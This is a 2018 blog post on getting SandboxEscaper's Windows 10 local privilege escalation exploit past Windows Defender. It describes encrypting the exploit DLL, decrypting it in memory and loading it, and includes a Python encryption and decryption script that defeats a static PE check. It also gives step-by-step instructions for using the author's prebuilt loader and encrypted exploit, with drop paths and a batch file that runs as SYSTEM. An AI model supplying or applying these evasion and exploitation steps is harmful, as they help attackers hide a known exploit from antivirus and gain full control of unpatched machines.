Bypassing Windows Defender to run SandboxEscaper's LPE exploit

SandboxEscaper recently disclosed a local privilege escalation exploit for Windows 10. It's very reliable, should work on most versions of Windows 10 (not updated since Sep 13th), and doesn't require any special conditions, but it is easily picked up by Windows Defender. Even if you modify it and build it yourself, it's still detected.

So I wanted to find a way around WD. This may sound easy to some people, but it wasn't for me, since I had never battled the new WD (in Windows 10) before.

After doing some research online I found little information about how WD actually works. What there is mentions AI, behaviour detection, etc. But, as it turned out later, none of that came into play here: WD did not flag anything in the memory of the running process, it only matched the static code of the exploit DLL sitting on disk. (That is what this exploit ran into with the Defender build of the time; it says nothing about what WD can do in other situations.)

The first thing that came to mind was to encode/encrypt the payload DLL, transfer the blob, and then load it, decrypt it in memory and run it. And that's exactly what I did. Here are the steps I performed:

  • encrypt exploit DLL

  • transfer it to target machine

  • load encrypted DLL file into memory

  • decrypt memory

  • load DLL from memory (DLL code gets executed)
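
As an added illustration (not the author's EncryptedDllLoader, whose cipher and file format the post does not describe), the Python script below does the encrypt and decrypt-in-memory steps with the standard library only: a SHA-256 keystream XORed over the DLL, with an HMAC tag so a wrong key is rejected instead of mapping garbage, plus a crude "does this look like a PE file" check standing in for the static scan. The sample DLL bytes are constructed here and are not a real DLL; the last step, mapping the decrypted image from memory, is the loader's job and is not shown.

```python
"""Encrypt a DLL for transport, decrypt it in memory, and check that the
on-disk blob carries none of the byte patterns a static scanner keys on.

Added example, not the EncryptedDllLoader from the post. Stdlib only:
the cipher is SHA-256 in counter mode XORed over the data, with an HMAC
tag over nonce + ciphertext. The sample DLL bytes are constructed.
"""
import hashlib
import hmac
import os
import struct
from typing import Optional

NONCE_LEN = 16
TAG_LEN = 32

# Strings and magics that identify a PE image; a trivial static check.
PE_MARKERS = (b"PE\x00\x00", b"This program cannot be run in DOS mode")


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Block i of the keystream is SHA256(key || nonce || i)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + struct.pack("<Q", counter)).digest()
        counter += 1
    return bytes(out[:length])


def _xor(data: bytes, stream: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, stream))


def encrypt_dll(dll: bytes, key: bytes, nonce: Optional[bytes] = None) -> bytes:
    """Return nonce || tag || ciphertext.

    A fresh random nonce per call means re-encrypting the same DLL gives a
    different blob each time, so the blob has no stable hash either.
    """
    if nonce is None:
        nonce = os.urandom(NONCE_LEN)
    if len(nonce) != NONCE_LEN:
        raise ValueError("nonce must be %d bytes" % NONCE_LEN)
    ct = _xor(dll, _keystream(key, nonce, len(dll)))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + tag + ct


def decrypt_dll(blob: bytes, key: bytes) -> bytes:
    """Check the tag first, then decrypt.

    Raises ValueError on a wrong key or a modified blob, so the loader
    never hands a corrupted image to the mapping step.
    """
    if len(blob) < NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short")
    nonce = blob[:NONCE_LEN]
    tag = blob[NONCE_LEN:NONCE_LEN + TAG_LEN]
    ct = blob[NONCE_LEN + TAG_LEN:]
    expected = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad key or corrupted blob")
    return _xor(ct, _keystream(key, nonce, len(ct)))


def looks_like_pe(data: bytes) -> bool:
    """Crude stand-in for a signature scan: DOS magic at offset 0, or any
    of the PE marker strings anywhere in the buffer."""
    return data[:2] == b"MZ" or any(m in data for m in PE_MARKERS)


def build_fake_dll() -> bytes:
    """Constructed placeholder with the markers a real DLL carries.
    It is not a valid PE image and cannot be loaded."""
    dos_header = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)  # e_lfanew = 0x80
    dos_stub = b"This program cannot be run in DOS mode.\r\r\n$"
    dos_stub = dos_stub.ljust(0x80 - len(dos_header), b"\x00")
    return dos_header + dos_stub + b"PE\x00\x00" + bytes(range(256)) * 4


if __name__ == "__main__":
    dll = build_fake_dll()
    key = os.urandom(32)
    blob = encrypt_dll(dll, key)
    print("plain looks like PE:", looks_like_pe(dll))
    print("blob looks like PE: ", looks_like_pe(blob))
    print("round trip intact:  ", decrypt_dll(blob, key) == dll)
```

The blob has no magic header of its own, so the wrapper format contributes nothing for a signature to match; what remains exposed is the loader binary itself, which is why a public loader eventually gets signatured and the decryption routine has to live in something you built.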


If you don't want to do this yourself, I created some binaries which can help. Here's what you need to do:

  • grab EncryptedDllLoader

  • grab the modified, encrypted version of the exploit DLL (or create your own and encrypt it yourself) (the modified version of the exploit is here)

  • place the payload DLL at C:\Users\Public\Documents\elev.dll (this DLL will be loaded into a SYSTEM process)

  • place your batch file at C:\Users\Public\Documents\test.bat (this batch file will be started with SYSTEM privileges)

  • run the DLL loader and choose option 4

  • An XPS print job will start and ask you to save a file. This should mean that all went well and your batch file was executed. You can close this dialog, after which the DllLoader will crash.


You can use this command (inside the batch file) to verify that you have elevated privileges:

whoami >> C:\Users\Public\Documents\whoami.txt

The file should contain: nt authority\system


Credits

  • SandboxEscaper for this awesome finding

  • idiots at micro$oft for making this possible

Written on November 14, 2018